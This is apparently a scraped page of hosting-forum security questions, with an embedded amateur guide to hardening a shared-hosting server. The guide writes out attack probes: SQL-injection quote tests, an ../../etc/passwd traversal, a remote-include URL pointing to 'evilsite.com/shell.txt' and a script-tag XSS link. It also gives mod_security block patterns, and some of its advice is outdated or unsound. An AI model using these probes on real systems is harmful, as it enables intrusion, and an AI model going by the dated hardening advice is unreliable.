Securing /tmp & /dev/shm
Dec 14, 2008Securing /tmp
View 4 RepliesSecuring /tmp
View 4 RepliesI'm running LiteSpeed, and wondering what PHP functions you disable(if any) when running a shared hosting server to protect against PHP Shells.
The problem I'm having is trying to figure out what lockdown without killing clients ability to host scripts that might rely on certain PHP functions to run.
linux and have just purchased a vps with CentOS 4 (godaddy). how secure the server is out of the box? Is there a firewall or anything that comes preloaded - if so, is there a way to tell. If there isn't, are there a couple that someone could list that would be worth my time to review.
 
i'm just using their Simple Control Panel.
what are the ways I can secure /dev/shm? The permission for this directory is set to 755 but somehow it is still compromised.
The directory permission is changed to 777 by the user apache, and the some flood/bot scripts are uploaded to the directory and executed for outbound ddos.
When cpanel 11 turns stable, I am planning on changing the setup for php on all my servers. Currently it runs as mod_php for the default installation of php and one server has php running in cgi mode for php5 (in addition to its normal mod_php setup for php4). 
Im not currently running anything like fastcgi, suphp, or phpsuexec. What do you think is the best setup to use that would add a nice security layer, but still allow users to have custom php.ini settings (without having to use an entire php.ini file), and still keep close to, if not better speeds as mod_php? I am thinking of dropping support for php4 in general and just keep one version of php on each server.
PHP support is very important to a large majority of my customers, so I really want to make sure this is done right. Its obviously going to be a big headache making the switch and I am definitely going to work closely with my reseller and personal customers to make sure it goes as smooth as possible.
some recommended docs/tutorials to secure your server? It will be used as a web server, running Cent OS 5 (most likely 64bit)
View 6 Replies View RelatedWill be getting a new dedicated server. I know that I need to install APF + BFD for sure, but what else would you recommend installing to secure the server? Apache's mod_security module? DOS module? What are the obvious candidates other than APF/BFD?
View 13 Replies View RelatedIs there a tutorial out there that shows how to secure a Plesk VPS? We did hire a server management company but after they installed some tweaks, Plesk broke and we had to re-install from scratch. Any security tutorials out there that is Plesk friendly?
View 8 Replies View RelatedI am on the verge of getting my first dedicated server (Win2k3 Standard). Just wondering if someone can point out a few resources to me about how to secure it, what softwares to use, etc.
View 9 Replies View RelatedI have three computers, 2 routers, 1 hub and 1 server machine on my network.
Up until now, we havn't worried about security much but I've decided that I want to secure it all. We have anti virus and software firewalls, as well as Windows XP firewall however, I cant seem to get the computers on the first router to talk to the computers on the other router.
My network setup is:
[url]
Router 1 is a Linxsys, its default gateway is 192.168.1.1
Router 2 is a Dynex E401 and its default gateway is 192.168.0.1
I tried changing the default gateways, but they lost internet.
For those of us that do not want to try and manage our own servers I have a question to those that already have been managing there servers for a while.
 
Once we get our server and install our OS and the control panels and have everything up and running then what should we look at doing to our server for security and to keep it secure from the web? 
I am debating how to additionally secure my Apache server. Chrooting is one thing that I have already done. It will limit the intruder to the jail I created. However I have around 30 different websites hosted on this machine. I am concern that once the hacker is inside the jail he will be able to gain access over all websites. How can I isolate the different websites from each other ? For example if oscommerce gets compromised I would like intruder not to be able to see the other websites.
On a completely different note I am curious about something. Why does big websites like google and facebook do not block icmp packets and allow udp connections for traceroute?
I am concerned as I get several emails containing this like this:
Large Number of Failed Login Attempts from IP xxx.xxx.xxx.xxx
I'm trying to stop it, as obviously, I don't want anyone gaining access to my server.
Any tips for making sure the server is really secure?
Should I secure my tmp folder/partition so nothing can be run/executed from it
 
Im running plesk 9 centos 5.3
 
How is this done
Saw this very detailed tutorial just posted on how to secure your Plesk based VPS. Lots of good step-by-step detail ...
View 2 Replies View RelatedWe have a simple flash site. Not CMS or anything of that sort.
Recently out site was hacked. Nothing malicious as the only code that seems to have changed was out index file in which they injected a malware script ....
I decided to use cPanels backup in a remote FTP server. But before that I want to password protect all the backups so that none unless me can open /restore the backups.
View 3 Replies View RelatedAnyone experiment with the best way to stop some spammers from spamming someone's web based form?
I see there are various random graphic letter generators that you need to read and type before hitting the submit button. 
-= Securing Your Hosting Company =-
-- Credits: DeadlyData --
Part I. Your own websites  security.
 
The first step you always want to take to secure  your hosting company is to make sure your own website.
Is completely  secure some things to do if you are using a common CMS Google it with the word  exploit make sure your version is not on there.     
Next try any Get Vars in  your scripts and put a ' at the end of them what I mean is you have = you add '  so it's yourwebsite.com/page?=' or any other similar thing not only page= you  may also try char(39) rather then only ' most PHP scripts will automatically add add slashes as a function in the MySQL read so when it goes to read it comments  out the ' but most PHP that only uses addslashes protection will still be vuln  to SQL injection simply using char(39) which the php script will read as  a  single quote. 
If you get an error you might want to check the script.  
 The errors you may receive are mysql_* this is a sql injection get right on  to fixing this because some one would have the ability of dumping your whole  database, clients, admins, etc. 
If the errors are main()or  include_failed you may have just found an LFI (Local File Inclusion) OR  RFI (Remote File Inclusion)... 
If it is in a path like failed to include  /test/file.ext ever then this is an LFI but is very useful to a hacker they have  the ability to use 
The following to browse into other places ../../../../ if  they wanted to they'd view your passwd file via  ../../../../../../etc/passwd  
Well right now you'd say big Woop they got some users maybe not but  still have the ability to go to any forum on 
that server and upload an  avatar with PHP-EXIF data in it then include it 
Using this LFI once they  have done this it will execute the code written in this LFI meaning they have  access to Run PHP-Code on your server now not good at  all...
Recommendations fix the script have mod security block all  ../../../../../ to a certain point attempts. 
Ok next were going to  discuss the abilities of an RFI and how to block it... 
So the things you can  do with an RFI well lets see remotely include an PHP file that will execute its  php file like so 
www.yoursite.com/file.php?file=evilsite.com/shell.txt?  this php file on your server would then remotely include the other file and  execute the PHP code also allowing the user access to your  server.
Prevention add http:// to your mod security this way when they  try remotely including a file in the URL
[url] mod_security will block it.
Ok our next subject is XSS this is a tricky  one on account of there are many ways around mod security blocking this...  
What can XSS do XSS means cross site scripting a hacker can execute  JavaScript code on your website using this some XSS is bad which would be called  permanent XSS it allows users to embed their JavaScript inside something where  you wouldn't really see it... but when you clicked they could potentially grab  your cookie or any current stored browser information. 
With this they could  use your cookie as their own to login as you... maybe even get password  information from this 
cookie...
Now the other type of XSS is  something you have to train your clients to look out for if some one ever asks  for help and sends you a link that is accessing a remote website in the URL such  as...  
www.mysite.com/info.php?xss=<script>src=[url]
Never click it what so ever... ban the person who has sent this. 
Ok  now for the mod_security bans... add <script> add <body= add  </script> add "> 
And this should fix your XSS problems that can  actually cause damage...
As for SQL injection the way to block this is  to... add ' or /* to the mod security be sure to add in char(39) as it's '  in php and php will in fact read it from a URL and interpret it as ' and still  launch the sql injection.
One other thing you can do that is not exactly  completely necessary but will help if any one does manage to get access to your  website.Is you can encrypt all your db.php/conf.php/ files so that hackers  cant read the information to gain access to your mysql database or gain any  other passwords/usernames you might commonly use more then once. 
     Zend should fix this problem. 
Never leave any open upload scripts what  so ever any open upload scripts left on your website will allow the  hacker/attacker the ability to upload a file sure you can restrict them to only  uploading JPG files or GIF,RAR etc.
But the only problem with that is unless  you customize your upload script to check for EXIF data and clear it out of an  image when uploading it then the hacker still has something to use against  you.
Part II. Your Employees
RULE-1 -PASSWORDS
Do  not use password even more then once on your servers if you do the first time  some one gets your password to any 
Thing they have the ability to get into  every thing on your server from there they get other peoples passwords and get  more and more access over time they can take the whole hosting  company...
RULE-2 -PHONE CHATS
Always request a person's information  verify every bit of it is correct also try to remember their voice because  hackers will call you and try to get into people servers they can have correct  information just by whoising the persons domain that their trying to  get.
RULE-3 -Email CHATS
This one is a bit easier there is no emotion  to what the person is trying to do...
If they slip up on one peace of  information be sure to email them back and ask them to correct it before even  
Sending any thing back or touching any thing.
RULE-4 -Talking to each  other
While talking to each other in public services.. or services  that my be able to be taped such as an IRC...
Be sure not to  mention any root passwords, client names, etc...
Part III. Securing Your Server
Ok well first were going to do the  obvious and CHMOD /home to 755
This is simple just go ahead and type  chmod 755 /home 
Or
CD  /
chmod 755 home
Next were going to make  sure no user has any bash access what so ever.
This may already be  setup by the current hosting control panel you are using...
If not were  going to nano /etc/passwd and make sure all Linux  users that you don't want having bash are set to 
/sbin/nologin
I realize some hosting companies also do  dedicated server companies so it wouldn't work out if your client didn't have  
bash to the server.
So this is mainly based for the shared hosting  servers.
Part IV. PHP  Configuration.
Now were going to  do some things to PHP.ini
usr/local/lib/php.ini
^ On Most Systems
safe_mode = On
safe_mode_gid = Off
open_basedir = directory  [:...]
safe_mode_exec_dir = directory [:...]
expose_php =  Off
register_globals =  Off
display_errors =Off
log_errors = On
error_log = filename
magic_quotes=On
disable_functions = show_source, system, shell_exec, passthru, exec,  
phpinfo,  popen, proc_open, base64_decode, base64_encodem, proc_terminate 
Some explanations of the functions your  disabling.
show_source(), Disables  functions most shells use to view the source of other files one commonly  
c99, ModfiedC99 (c100), ModfiedC99(x2300)
phpinfo(), Sometimes will bring up XSS, also numeral  overflows have been found while using PHPINFO() that  and you don't 
want people getting your version of PHP and etc. to attempt to  exploit it if you may just be out of date or to up to 
date.
system, Allows Bash Commands Via PHP
shell_exec, Allows Bash Commands via PHP
exec, Allows Bash Commands Via PHP
popen, Almost like Bash not quite but close using  PHP
proc_open, Almost like bash not quite but  close using PHP
base64_decode, decodes base64  encryptions... reason for disabling also allows users with server access to  bypass mod security
base64_encode, encodes  base64 encryptions... reason for disabling also allows users with server access  to bypass mod security
proc_terminate,  Terminates Processes running on the server.
Some reasons for having magic  quotes on, it disables most nullbyte attempts (%00)
And will stop a small majority of SQL  injections.
Part V. MySQL and Apache Configurations
  
Disable all out bound MYSQL connections...
Besides from  Trusted Servers
This may actually be set in the host's field of the  users in the actual MYSQL table, for each user account it lets you 
Give them  an IP or type any I'd recommend giving them an IP...
Although when you give  them and IP don't worry it's not that you can only have one IP able to access  that user you 
do in fact have the ability to recreate the user
over and  over and fill in the IP field differently each time.
Next you need to configure your apache to where it runs 1 process  for each linux user and all scripts ran by that user run under their unix/linux  permissions,GID & UID
A reference Document on how to do this can  be found here.
[url]
Comments:
What this will do with apache is pretty much  make sure that the users can't access other users directories on the 
Server  this is a common vulnerability you get access to one site on the server and you  get access to all websites on the same 
server... this protects against it.  All though apache is running under each user using SuEXEC would solve that  problem.
Part VI. SSH Keys.
    
It's not required but it is a  recommendation to setup SSH keys this way people do not have the ability to  brute force your SSH server.
A tutorial on how to do this can be  found here:
[url] 
If you do not wish to setup SSH Keys you may also use Linux  host.allow, host.deny files to sort which ranges have the ability to access your  server and which do not have the ability to access your server.
There  are some references for this located here 
[url]
And  here 
[url]
Part VII.   BackDoor-Trojan-Rootkit  Proctection  & FireWall  Setup
     
Down To The Back Door Protection 
In the even some one gets access to your server even with all the  security you've gotten so far they might just be able to figure out one way or  another to slip a backdoor in or in the case of ubiquity a botnet  client,
So what exactly are some things you can do to prevent this if  not stop it. 
Well I honestly don't think you can stop things like root kits,  Trojans, viruses, botnet clients etc. from being on your System.
But  you can stop or remove them once their on your system, or prevent them from  being ran. 
What all can a person do just by having the ability to upload a  file.
Not much but once they find ways to execute what they have uploaded  then you can pretty much consider them having root to your server.
At  this point they can run multiple exploits that may be able to BoF(Buffer Over  Flow) An process running under root on your system and from there they could get  lucky and have the ability to execute code as that process. 
Another thing they can do without having root is install an botnet  client once this is done they have the ability to use your servers as their own  resource to take other things down.
Trojans & Viruses on Linux  aren't too much of a worry as there aren't too many out there but the ones  that are made might just have enough access to delete most of the HDD on the  Linux system. 
Now a couple things I've researched on that can help prevent  this.
---
Root Kit  Hunter.
---
Description:
    Root  kit scanner is scanning tool to ensure you for about 99.9%* you're clean of  nasty tools. This tool scans for 
Root kits, backdoors and local exploits by  running tests like: 
    - MD5 hash compare
    - Look for default files used by root  kits
    - Wrong file permissions for binaries
    - Look for  suspected strings in LKM and KLD modules
    - Look for hidden files
    -  Optional scan within plaintext and binary files
-------
Comments:
I highly recommend Root Kit Hunter.
---
Download
---
[url]
---
Clam Antivirus
---
Description:
    
    * Command-line scanner
    *  Fast, multi-threaded daemon with support for on-access scanning
    * milter  interface for sendmail
    * advanced database updater with support for  scripted updates and digital signatures
    * virus scanner C library
     * on-access scanning (Linux and FreeBSD)
    * virus database updated  multiple times per day (see home page for total number of signatures)
    *  built-in support for various archive formats, including Zip, RAR, Tar, Gzip,  Bzip2, OLE2, Cabinet, CHM, 
BinHex, SIS and others
    * built-in support  for almost all mail file formats
    * built-in support for ELF executables  and Portable Executable files compressed with UPX, FSG, Petite, NsPack,  
wwpack32, MEW, Upack and obfuscated with SUE, Y0da Cryptor and others
     * built-in support for popular document formats including MS Office and Mac  Office files, HTML, RTF and PDF
-------
Comments:
Honestly I'd recommend this even when using  Mod-Security I've built shells that will in fact bypass modsecurity well  
this well scan the source codes of the PHP shell
and make sure there�s  nothing that could potentially harm or allow the user to have to much access  over the system.
---
Download
---
[url]
--
Banning The Brute Forcers,  FTP, SSH, etc.
---
APF (Advanced Policy  Firewall)
--- 
Description: 
Rather then grabbing this one off their site I figured I'd write  one. 
        Well in my experience this is nothing like a normal firewall  you would use on an windows system it checks for things like people trying  to brute force Cpanel, SSH, FTP, etc. accounts.
      Allows alot of  configuration options some of which may also benfit in bandwidth saving and DDoS  prevention, 
      Over all it blocks those ports your not using so even if  some one manages to get an undetectable backdoor/botnet on your  systems.
      Then this will block it from connecting back to them and them  connecting back to it.
---
Comments:
I will  tell you no though this will be a pain to setup while hosting so many teamspeaks  on account of all the ports you would have to constantly forward.
To make  sure every one has the ability to get into their teamspeaks, 
Some commands that can be used with this Firewall just incase you  decide to use it.
Banning an IP
apf -d IP
        
Unbanning an  IP
apf -u IP
I recommend ignoring your own IP in the 
/etc/apf/allow_hosts.rules 
Using the following syntax you can ignore your IP from all firewall  rules meaning you don't follow them.
d=PORT:d=IP  // ENABLES YOUR IP COMMING  IN ON THE PORT
out:d=PORT:d=IP // ENABLES YOUR IP GOING OUT ON THE PORT
For ranges  you may do the following 192.168.1.1/255
It will then forward from  192.168.1.1 to 192.168.1.255 to be enabled
---
Download
---
[url]
Part VIII. DDoS Protection and Saving Bandwith + Remote  Loging.
---
Server Monitoring  Remotely
---
Log Watch
---
Description: 
An application that runs twenty-four seven on your server and sends  the following things after going through them to your email.
       -Apache_Access Logs
      -Apache_Error Logs
      -SSH_LOGIN's Failed  Or Succeeded
      -FTP Logs
      -Mail Logs
      -Current HDD  Sizes
      -Kernel Logs
      -Mail Logs
      -Yum/APT-GET  Logs
Comments:
This thing is very useful  attempts to gain access to your server will be automatically emailed to you  along with every thing that is not found gave some one and forbidden error and  etc.
The only main requirement is that you have SendMail Running.
Mail Spam Protection
---
Spam Assassin
---
Description:
        
        The core distribution  consists of command line tools to perform filtering along with  Mail:pamAssassin, a set of Perl modules which allow SpamAssassin to be used in  a wide range of products.
Comments:
Never  used it my self because I've never really had to bad of mail spam problems on my  server but from what I've 
read it is in fact pretty good at filtering out  the spam in your emails.
---
Download
---
[url]
---
Some Extra Mail  Protection
---
Be sure that your mail-server only allows your  Server to use it or any other servers you may trust and deny all  
others
many people will attempt to use open mail servers and spam  resources.
---
DDoS Protection & Bandwidth  Saving.
---  
Ok first off some things people might do while  DDoSing you.
Unless theDDoS attack is very strong I highly doubt it will take your  whole server offline most DDoS attacks will mainly  hit their targets port
in most cases their target would be Apache, but in other cases maybe even a teamspeak it's a  little more difficult to stop without having to get all of your clients IP  addresses and adding them to the ignore lists in APF 
But a basic thing you can do is have APF installed drop all ICMP  packets. This will disable the ability to ping your server.
Next Install  DDoS Deflate
---
DDoS Deflate
---
Comments/Description:
From my own experience an well  written Perl Script that was made to run along with APF and monitor how many  times an 
IP is connected to your server before it bans it you may also run  it manually typing the following in shell.
        
        ddos Number Of Connections  Allowed 
When this is typed the Perl script will then run an netstat command check how many times each IP is connected  and if there are more then the number of connections you specified then it will  automatically run a command in APF for the IP to be  banned.
---
More Information can be found on  this at
[url]
----
Download
----
[url]
Ok now for bandwidth saving and DDoS  protection at the same time there is this really cool thing made for apache servers it's called mod_evasive
It will limit the number of connections a  person may open with apache and if they open to many  it will ban them for what ever time you specify in the config.
---
mod_evasive
--- 
        Detailed Description:
         mod_evasive is an evasive maneuvers module for Apache to provide evasive action  in the event of an HTTP DoS or DDoS attack or brute force attack. It is also  designed to be a detection and network management tool, and can be easily  configured to talk to ipchains, firewalls, routers, and etcetera. mod_evasive  presently reports abuses via email and syslog facilities.
         Detection is performed by creating an internal dynamic hash table of IP  Addresses and URIs, and denying any single IP address from any of the  following:
       * Requesting the same page more than a few times per  second
       * Making more than 50 concurrent requests on the same child per  second
       * Making any requests while temporarily blacklisted (on a  blocking list) 
        This method has worked well in both single-server script  attacks as well as distributed attacks, but just 
like other evasive tools,  is only as useful to the point of bandwidth and processor consumption (e.g. the  amount of bandwidth and processor required to receive/process/respond to invalid  requests), which is why it's a good idea to integrate this with your firewalls  and routers for maximum protection.
        This module instantiates  for each listener individually and therefore has a built-in cleanup mechanism  and scaling capabilities. Because of this per-child design, legitimate requests  are never compromised (even from proxies and NAT addresses) but only scripted  attacks. Even a user repeatedly clicking on 'reload' should not be affected  
Unless they do it maliciously. mod_evasive is fully tweak able through the  Apache configuration file, easy to 
Incorporate into your web server, and  easy to use.
--- Comments:
This is a module I have  in fact used with Apache before it honestly can get annoying if you configure it  incorrectly 
because you will be simply visiting the website and get  banned.
---
Download/Install  Tutorial
---
[url]
 --= That Will Cover Alot Of Security Issues =-
way to secure a server? I have iptables on my box but havent seen any scripts which i can base my config on.
I have seen that APF seems to be popular, and from the scripts seems quite simple to setup.
I'm not afraid of iptables per se but i would like a script on which to base for cpanel, do any exist?
I also like the simplicity of APF but i am currently running static nat on iptables and wish to maintain this functionality, the server is used as a vpn gateway.
Any ideas or links to base configuration scripts that would be suitable and maintain my static nat? Are there any checklists which i could go against to ensure everything is secure?
secure a windows server 2003 traffic.
I have one server with a small number of clients <10. The clients have dynamic IPs.
The server hosts a number of public facing websites, email, FTP and remote desktop.
What I want to do is make port 80 respond to all web requests but lock all other services down so that they only respond to my 10 clients. I was thinking some certificate or VPN solution but I've ruled VPN out as I don't have a firewall or VPN so would I be able to do this with IPSEC? 
Is there quick utility that would do this or can you point me to a good example article?
set up a site where I can place some files (rad only) for people to view for a limited time. The user would need an ID and PW to access the site and I might like to be able to limit the number of times they could access the site.
View 3 Replies View RelatedIm trying to find a script or a suggestion that will help me determine whether or not if my tmp directory is secure.  My tmp directory is already mounted as noexec and nosuid, however I would like to think there's a script out there that i can use to test it out.   Reason im asking is for a vdedicated account i have  My mount shows this
/tmp on /var/tmp type none (rw,noexec,nosuid,bind)
but my fstab is just this
none    /dev/pts        devpts  rw      0       0
Im using csf as my firewall instead of apf and with some of its self checks it's saying that my tmp directory is not secure.
I asked my current vps supplier about changing the certificate used to secure the plesk control panel as the default one causes certificate warnings. Their response was "dont worry about the warnings, the control panel is secure and trying to address the error can cause problems in plesk itself".
Is this correct?, I know the cp is still secure but customers arent going to think ssl certificate warnings are OK. I think their response was more of we cant help you so dont worry about it type response (a.k.a the brush off)
Is this an issue with plesk? vps is windows server 2k3
I have a lot of experience with VPSs and recently have been working with dedicated servers but my partner and I are going to be providing VPSs and my main concern is securing the node the VPSs will be on. Would I secure it like a normal dedicated server? 
I'm worried that if I secured it like I would my dedicated servers it would affect the VPS clients hosted on there. Any assistance is appreciated, even if it's just a recommendation for a management company or single user who could assist us.
We have discussed all the basic methods of securing and hardening the server. Lets leave all the basic and general server securing and hardening I have started this to get advance knowledge in securing and hardening of the server so that it will usefull for all the person So i request all to provide all the vaulable tips and suggestions in advance securing and hardening of linux servers I welcome all the comments related to advance securing and hardening of linux servers.
View 5 Replies View RelatedI'm setting up a web site for my online music library, doing it the hard way and learning as I go!
What I want to do I keep all the audio files secure so only registered users can get at them, how do I do this? FTP? permissions? Can I pass the user data from the client database somehow or do I have to set it up manually for each client? 
I'm using php and mysql and have a table set up with all the file locations in it and that side of things is mostly working well. Once a user gets the URL of the file how do I make sure only that user can download the file?
I've tried searching the web for info but I have the sneaking suspicion I'm not asking the right question.